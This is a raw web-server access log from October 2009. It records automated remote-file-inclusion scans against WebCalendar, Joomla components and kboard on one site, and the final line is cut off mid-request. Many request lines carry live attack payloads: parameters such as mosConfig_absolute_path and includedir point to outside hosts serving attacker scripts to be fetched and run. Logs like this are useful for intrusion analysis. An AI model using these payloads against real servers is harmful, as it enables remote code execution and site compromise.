211.115.89.97 - - [26/Oct/2009:05:54:50 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:54:50 -0700] "GET /logs/access_090914.log//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:54:50 -0700] "GET /logs//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:05:54:50 -0700] "GET /logs/access_090316.log//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.240.39.225 - - [26/Oct/2009:05:55:27 -0700] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.240.39.225 - - [26/Oct/2009:05:55:27 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.240.39.225 - - [26/Oct/2009:05:55:30 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.240.39.225 - - [26/Oct/2009:05:55:45 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.240.39.225 - - [26/Oct/2009:05:55:46 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.240.39.225 - - [26/Oct/2009:05:55:46 -0700] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.240.39.225 - - [26/Oct/2009:05:57:04 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.240.39.225 - - [26/Oct/2009:05:57:15 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
119.68.194.119 - - [26/Oct/2009:05:58:12 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:05:58:12 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:05:58:12 -0700] "GET /logs/access_091012.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:05:58:16 -0700] "GET /logs/access_091012.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:05:58:16 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:05:58:16 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:59:32 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:59:32 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:59:33 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:05:59:33 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:06:00:08 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:06:00:09 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:06:00:09 -0700] "GET /logs/access_090928.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:06:00:24 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:06:00:25 -0700] "GET /logs/access_091012.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:06:00:25 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [26/Oct/2009:06:00:25 -0700] "GET /logs/access_091012.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:06:00:49 -0700] "GET /logs/access.log//Stats/bookmark4u/lostpasswd.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [26/Oct/2009:06:00:58 -0700] "GET /logs/access.log//Stats/bookmark4u/lostpasswd.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [26/Oct/2009:06:01:15 -0700] "GET /logs/access_091012.log//Stats/bookmark4u/lostpasswd.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [26/Oct/2009:06:01:19 -0700] "GET /logs/access_091012.log//Stats/bookmark4u/lostpasswd.php?=http://www.kortech.cn/bbs/skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:06:02:47 -0700] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:06:02:47 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:06:02:47 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:06:03:27 -0700] "GET /logs/access_090525.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [26/Oct/2009:06:03:43 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [26/Oct/2009:06:03:43 -0700] "GET /logs/access_091012.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [26/Oct/2009:06:03:43 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [26/Oct/2009:06:05:59 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [26/Oct/2009:06:05:59 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [26/Oct/2009:06:06:05 -0700] "GET /logs/access_091012.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [26/Oct/2009:06:06:54 -0700] "GET /logs/access_090817.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://family365.com/board//skin/ggaggo_pds/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.240.39.225 - - [26/Oct/2009:06:09:59 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.240.39.225 - - [26/Oct/2009:06:10:00 -0700] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.240.39.225 - - [26/Oct/2009:06:10:00 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:10:18 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:10:18 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:10:18 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:10:18 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
67.214.171.233 - - [26/Oct/2009:06:11:02 -0700] "GET /logs/access_090615.log HTTP/1.1" 200 2862469 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.galf.org"
200.180.30.42 - - [26/Oct/2009:06:14:10 -0700] "GET /logs/access_090615.log/index1.php?pagina=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:14:38 -0700] "GET /logs///components/com_quran/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:14:38 -0700] "GET //components/com_quran/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:14:38 -0700] "GET /logs/access_090525.log%20%20///components/com_quran/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.131.59 - - [26/Oct/2009:06:14:55 -0700] "GET /logs/access_090921.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.131.59 - - [26/Oct/2009:06:14:55 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.131.59 - - [26/Oct/2009:06:14:55 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
200.180.30.42 - - [26/Oct/2009:06:14:58 -0700] "GET /logs/access_090615.log/index1.php?pagina=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.180.30.42 - - [26/Oct/2009:06:14:58 -0700] "GET /index1.php?pagina=http://www.tsang.com/gns/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:15:07 -0700] "GET /logs/access_091012.log%20%20///components/com_quran/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:06:15:25 -0700] "GET /index.php?classified_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:06:15:25 -0700] "GET /logs//index.php?classified_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:06:15:25 -0700] "GET /logs/access_090406.log//index.php?classified_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:15:44 -0700] "GET /logs/access_090810.log///components/com_quran/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:15:44 -0700] "GET /logs///components/com_quran/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:15:44 -0700] "GET //components/com_quran/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:15:48 -0700] "GET /logs/access_090525.log///components/com_quran/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:06:15:53 -0700] "GET /logs/access_090406.log%20%20//index.php?classified_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:06:15:53 -0700] "GET /index.php?classified_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.97 - - [26/Oct/2009:06:15:53 -0700] "GET /logs//index.php?classified_path=http://denie.fileave.com/zfxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:06:16:17 -0700] "GET /logs/access_090518.log/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:06:16:17 -0700] "GET /?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:06:16:17 -0700] "GET /logs/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
219.240.39.225 - - [26/Oct/2009:06:16:50 -0700] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.240.39.225 - - [26/Oct/2009:06:16:50 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.240.39.225 - - [26/Oct/2009:06:16:50 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:06:17:11 -0700] "GET /logs/access_090921.log%20%20/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:06:17:11 -0700] "GET /logs/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
207.58.165.81 - - [26/Oct/2009:06:17:11 -0700] "GET /?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [26/Oct/2009:06:17:35 -0700] "GET /?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [26/Oct/2009:06:17:35 -0700] "GET /logs/access_090518.log/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [26/Oct/2009:06:17:35 -0700] "GET /logs/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [26/Oct/2009:06:17:58 -0700] "GET /logs/access_090921.log%20%20/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [26/Oct/2009:06:17:58 -0700] "GET /logs/?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [26/Oct/2009:06:17:58 -0700] "GET /?sourcedir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:19:13 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:19:13 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:19:13 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:19:13 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
77.222.131.59 - - [26/Oct/2009:06:27:01 -0700] "GET /logs/access_090928.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.pmibangalorechapter.org/pmpc2009/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:29:09 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:29:09 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:29:10 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:29:10 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:38:21 -0700] "GET //setup.php?setup[use_category]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:38:21 -0700] "GET /logs/access_090928.log%20%20///setup.php?setup[use_category]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:38:21 -0700] "GET /logs///setup.php?setup[use_category]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:39:19 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:39:19 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:39:19 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
174.143.3.188 - - [26/Oct/2009:06:39:19 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:39:23 -0700] "GET /logs/access_090622.log%20%20///setup.php?setup[use_category]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:39:24 -0700] "GET //setup.php?setup[use_category]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:39:24 -0700] "GET /logs///setup.php?setup[use_category]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:39:24 -0700] "GET /logs/access_090928.log///setup.php?setup[use_category]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.152.241 - - [26/Oct/2009:06:39:43 -0700] "GET /logs/access_090622.log///setup.php?setup[use_category]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.171.190.107 - - [26/Oct/2009:06:45:01 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.masuccessgu